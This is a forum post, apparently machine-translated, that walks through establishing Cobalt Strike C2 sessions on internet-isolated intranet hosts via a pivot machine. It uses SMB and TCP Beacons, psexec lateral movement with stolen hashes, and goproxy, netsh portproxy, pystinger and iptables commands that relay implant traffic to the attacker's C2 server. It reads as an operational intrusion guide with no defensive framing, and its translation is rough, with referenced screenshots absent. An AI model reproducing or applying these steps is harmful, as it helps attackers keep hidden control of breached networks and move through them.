Title: Various postures for CS online without going online

Posted April 10Apr 10

0x01 There is a transfer machine

There is a transfer machine, and this machine is out of the network, which is the most common situation.

Often, you get an edge machine, which has multiple network cards, and the intranet machines do not leave the network. In this case, you can use this edge machine to transfer and go online.

The topology is roughly as follows :

Online method 1: SMB Beacon

Introduction

Official website introduction: SMB Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are connected, the child Beacon obtains the task from the parent Beacon and sends it.

Because the connected Beacons uses Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, SMB Beacon is relatively hidden and may perform miraculously when surrounding the firewall.

Using

This Beacon requires that the host with an SMB Beacon must accept connections on port 445. Derived an SMB Beacon method: generate SMB Beacon target host in Listner Right-click spawn and select the corresponding Listener to go online

Or use the command spawn smb in Beacon (smb is my smb listener name)

Use plug-in, or scan the intranet machine with own port

Go to view and select the target

Using psexec

Select a hash, select the smb listener and the corresponding session

Go online

After successful run, the character ∞∞ can be seen outside, which is the derived SMB Beacon.

It is currently connected, you can use the link ip command to link it or the unlink ip command to disconnect it on Beacon.

This kind of Beacon is used a lot in the horizontal penetration of the intranet. In an intranet environment, you can use the SMB Beacon generated by ipc$ to upload it to the target host for execution, but the target host will not be directly online. We need to use the link command (link ip) to connect it.

Online method 2: Transfer listener(Reverse TCP Beacon)

In fact, it is similar to the method

The following will be automatically configured

Then, like the above method, find the intranet host and know the account password, and pass psexec horizontally, select the transit listener

Online method three: HTTP proxy

The transit machine does not need to be online

Use goproxy project as agent, project address:

https://github.com/snail007/goproxy

Process: 1. Upload proxy.exe to the web server (edge host), and enable http proxy on port 8080

C:\proxy.exe http -t tcp -p '0.0.0.0:8080' --daemon

2. Use the netsh command to redirect traffic to access port 822 of the intranet ip 192.168.111.131 (must be an unused port, otherwise it will fail) to redirect traffic to port 8080 of the external ip 192.168.1.88

netsh interface portproxy add v4tov4 listenaddress=192.168.111.131 listenport=822 connectaddress=192.168.1.88 connectport=8080

3. Create listener, configure it as follows

4. Generate a stageless payload, execute it on the business server, and successfully go online

Connection process

192.168.111.236 → 192.168.111.131:822 → 192.168.1.88:8080→ C2(192.168.1.89)

Online method 4, TCP Beacon (forward)

Forward connection is similar to SMB Beacon. A parent beaconSMB Beacon is also required, and TCP Beacon is compatible with most actions derived from Cobalt Strike. Except for some

User-driven attacks requiring explicit stagers (for example: Attacks → Packages , Attacks → Web Drive-by ). test:

Generate a tcp beacon

Use this beacon to generate a Trojan in the form of stageless:

Upload to the target machine to run:

Use the connect [ip address] [port] command to connect in the Beacon of the transit machine to go online:

To destroy a Beacon link, use unlink [ip address] [session PID] in the console of the parent or child session. Later, you can reconnect to TCP Beacon from the same host (or other host).

Online method 5. Use pystinger for proxy forwarding

Detailed use of pystinger See the following chapter. Here is a brief demonstration:

Generally, pystinger will not be used in this scenario

Test environment: Attack aircraft kali: 192.168.1.35

Web server: 192.168.1.70, 192.168.111.129

Business server: 192.168.111.236

Process: 1. Upload proxy.php to the WEB server website directory, and return to UTF-8 when accessing normally

The web server external network ip is 192.168.1.70

Upload stinger_server.exe and execute

start stinger_server.exe 0.0.0.0

Execute on attack aircraft (192.168.1.89)

./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000

At this time, the 60020 port of the web server has been forwarded to the 60020 port of vps.

CS settings to listen, HTTP Hosts is the intranet IP of the transit machine, and the port is 60020:

Use psexec to move horizontally, select listener as pystinger, or directly generate payload to execute on the business host, and the business intranet host 192.168.111.236 can be successfully launched:

Supplement: The transfer machine is Linux

HTTP proxy (the transit machine does not need to be online)

The usage method is the same as the above method three. Just use iptables to forward:

echo 1 /proc/sys/net/ipv4/ip_forward

iptables -A PREROUTING -p tcp -d 192.168.111.131 --dport 822 -j DNAT --to-destination 192.168.1.88:8080

iptables -A POSTROUTING -p tcp -d 192.168.1.88 --dport 8080 -j SNAT --to-source 192.168.111.131

Test: Transfer Machine (192.168.111.142)

Attack aircraft

Generate a stageless payload, execute it on the target machine, and successfully go online

Connection process: (Re-screened image, port changed 8080-8081)

192.168.111.140 → 192.168.111.142:8080 → 192.168.111.142:8081→ 192.168.111.131:81(C2)

Use pystinger for proxy forwarding

Like the above method five, after establishing a pystinger connection, directly generate a payload to execute on the business host, and the business intranet host 192.168.111.236 can be successfully launched.